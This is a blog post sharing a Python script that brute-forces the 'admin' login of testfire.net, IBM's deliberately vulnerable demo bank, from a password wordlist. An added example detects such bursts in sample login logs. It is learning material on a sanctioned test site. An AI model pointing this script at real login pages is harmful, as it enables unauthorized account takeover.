Inspired by the amazing null humla session that I attended, I thought of writing my own simple login brute-forcer in Python using Requests. There are a lot of brute-forcing scripts in the market, but I thought of writing my own.

I love the Requests library for Python; as the author says, "It's HTTP for Humans", and it actually is. I really encourage using this library at least once if one wants to start learning Python web scraping.

I have also used the BeautifulSoup library to extract a few HTML tags. The website which I have used is http://www.testfire.net, which is a vulnerable bank application developed by IBM for web app testing.

The script is used to brute force all possible passwords against a single user name, "admin". I initially tried writing it with cookiejar, but somehow the code got a little lengthier, and then Requests came to my rescue.

The script opens a file called 'password.txt' containing a list of random passwords to brute force. In this case the correct password is "admin". With the Requests library it is possible to intercept the request in a proxy before it hits the server. Here I am running a proxy on port 8082 just to see the data that my script is sending. Feel free to use the script (for learning purposes only); here is the gist link.

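#Author: Prajal Kulkarni
import sys

import requests
from bs4 import BeautifulSoup as BS

# Route the traffic through a local proxy on port 8082 so each request can be inspected
proxyDict = {"http": "http://127.0.0.1:8082"}
url = "http://www.testfire.net/bank/login.aspx"


def connect(url, m):
    # Submit the login form with the current user name and password
    t = requests.post(url, data=m, proxies=proxyDict)
    print(t.text)
    soup = BS(t.text, "html.parser")
    # The script treats the text "MY ACCOUNT" in this link as a successful login
    a = soup.find('a', id="_ctl0__ctl0_Content_AccountLink")
    x = str(a.string) if a is not None else ""
    print(x)
    if x == "MY ACCOUNT":
        print("The pass is" + " " + m['passw'])
        sys.exit()
    else:
        print("Password %s not working" % m['passw'])


def controller():
    m = {}
    # One candidate password per line
    with open('password.txt', 'r') as fh:
        f = fh.read().split('\n')
    for line in f:
        if not line:
            continue  # skip blank lines such as the trailing newline
        m["uid"] = "admin"
        m["passw"] = str(line)
        m["btnSubmit"] = "Login"
        print(m)
        connect(url, m)


controller()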
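
Seen from the server side, a script like this produces a burst of failed logins for one user name from one source, sometimes ending in a success. The following is an added example, not part of the original post, that flags that pattern in login events; the event tuple layout, the threshold of 5 failures and the 60-second window are assumptions, and the sample events are constructed.

```python
from collections import defaultdict, deque

# Constructed sample events: (epoch_seconds, source_ip, username, login_succeeded)
SAMPLE_EVENTS = (
    [(1000 + 2 * i, "203.0.113.7", "admin", False) for i in range(6)]
    + [(1012, "203.0.113.7", "admin", True),       # success right after the burst
       (1003, "198.51.100.20", "jsmith", False),   # ordinary mistyped password
       (1009, "198.51.100.20", "jsmith", True)]
)


def detect_bruteforce(events, max_failures=5, window=60):
    """Flag (source, user) pairs with max_failures failed logins inside `window` seconds.

    Each alert also records whether a successful login followed the burst,
    which is the case that needs a credential reset rather than only a block.
    """
    recent = defaultdict(deque)  # (ip, user) -> timestamps of failures still in the window
    alerts = {}                  # (ip, user) -> alert record
    for ts, ip, user, ok in sorted(events):
        key = (ip, user)
        if ok:
            if key in alerts:
                alerts[key]["success_after_burst"] = True
            recent[key].clear()  # a success resets the failure streak
            continue
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if key in alerts:
            alerts[key]["failures"] += 1
        elif len(q) >= max_failures:
            alerts[key] = {"source": ip, "user": user, "first_seen": q[0],
                           "failures": len(q), "success_after_burst": False}
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_EVENTS):
        print(alert)
```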